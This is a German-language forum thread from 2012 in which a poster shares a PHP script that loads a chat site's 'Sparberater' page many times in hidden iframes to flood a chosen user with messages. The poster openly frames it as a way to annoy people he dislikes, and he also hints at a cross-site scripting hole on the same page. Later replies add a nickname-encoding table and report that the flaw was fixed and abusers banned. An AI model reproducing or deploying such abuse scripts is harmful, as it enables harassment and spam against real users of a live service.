Du bist nicht angemeldet.

Lieber Besucher, herzlich willkommen bei: Banana-Coding.com - Java Knuddels Emulator. Falls dies dein erster Besuch auf dieser Seite ist, lies bitte die Hilfe durch. Dort wird dir die Bedienung dieser Seite näher erläutert. Darüber hinaus solltest du dich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutze das Registrierungsformular, um dich zu registrieren oder informiere dich ausführlich über den Registrierungsvorgang. Falls du dich bereits zu einem früheren Zeitpunkt registriert hast, kannst du dich hier anmelden.

Localhost

Ehemaliger Supporter

  • »Localhost« ist der Autor dieses Themas

Beiträge: 345

Wohnort: 127.0.0.1

  • Private Nachricht senden

1

17.03.2012, 12:23

Knuddels /m Spam

Hallo,

heute brachte Knuddels 'ne /news bzgl. dem Sparberater raus... Und die haben 'nen fetten Bug mit produziert. Diesen wollen wir uns natürlich nicht nehmen lassen und ihn ausnutzen:

PHP-Quelltext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);

$id str_replace(" ""+"$_GET[id]);
$url 'http://www.knuddels.de/sparberater/sparberater.html?&n='.$id;
$anzahl = (int)$_GET[anzahl];

if(empty($anzahl)) {
    $anzahl 10;
}

if(!empty($id)) {
    echo 'target: '.$id.' => '.$anzahl.'...<br>';
    echo str_repeat("<iframe src="$url" width="100" height="100"></iframe>"$anzahl);
}

?>


Aufrufbar über DATEI.php?anzahl=10&id=Holgi.
110 /m's kann man sich maximal damit machen und Leute, die man nicht mag, nerven. :D
Darüber hinaus ist XSS ebenfalls möglich: www.knuddels.de/sparberater/sparberater.…oobs")</script> , aber das werd ich nicht weiter komentieren.

Viel Spaß damit,
Localhost

EDIT:
Wenn ihr das Programm nicht installieren wollt, weil das eh kein Arsch braucht, folgenden Link aufrufen:
http://www.knuddels.de/sparberater/sparberater_confirm.html?&n=NICK&h=ID1&r=ID2&status=1

NICK, ID1, ID2 entsprechend ersetzen (findet ihr im Quelltext) ;)
No support via message.

"Der gute Programmierer ist nicht der, der keine Fehler macht, sondern der, der seine Fehler rasch findet und behebt."

Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von »Localhost« (17.03.2012, 12:58)


Es haben sich bereits 4 registrierte Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Flav, Steelix2011, wishdream, Mentos

2

17.03.2012, 15:01

Geht nicht bei Nicknamen mit Umlauten - nur als Hinweis.
Habe es selber mit einem neuen Nicknamen im Chat getestet der Umlaute enthielt und dann/sparberater gemacht - auch so manuell ging es nicht.

Aber nice Bug :d

3

17.03.2012, 15:43

Einfach die Url http://www.knuddels.de/sparberater/sparberater.html?&n=Nick mit dem gewünschten Nick aufrufen und immer wieder auf refresh klicken
Geht auch :D

4

17.03.2012, 16:14

Wenn man des mit einen Nicknamen machen möchte, was Umlaute besitzt, müssen diese Replaced werden:

PHP-Quelltext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
            $replace = array(
                "-" => "_cn",
                "ä" => "_oe",
                "ö" => "_pg",
                "ü" => "_pm",
                "ß" => "_np",
                "&" => "_cg",
                "=" => "_dn",
                "@" => "_ea",
                "+" => "_cl",
                "<" => "_dm",
                ">" => "_do"
            );
            
            foreach($replace AS $name => $value) {
                $nickname str_replace($value$name$nickname);
            }

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

CraZE

5

17.03.2012, 21:38

das mit dem php script funkt nicht.

6

17.03.2012, 21:39

Lücke wurde gefixxt.

#Closed.

Localhost

Ehemaliger Supporter

  • »Localhost« ist der Autor dieses Themas

Beiträge: 345

Wohnort: 127.0.0.1

  • Private Nachricht senden

7

18.03.2012, 00:05

# Push

Habe gerade erfahren, dass alle Nicks, die diesen Bug ausgenutzt haben, morgen eine 80-tätige Sperre bekommen.
No support via message.

"Der gute Programmierer ist nicht der, der keine Fehler macht, sondern der, der seine Fehler rasch findet und behebt."

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Ahmeet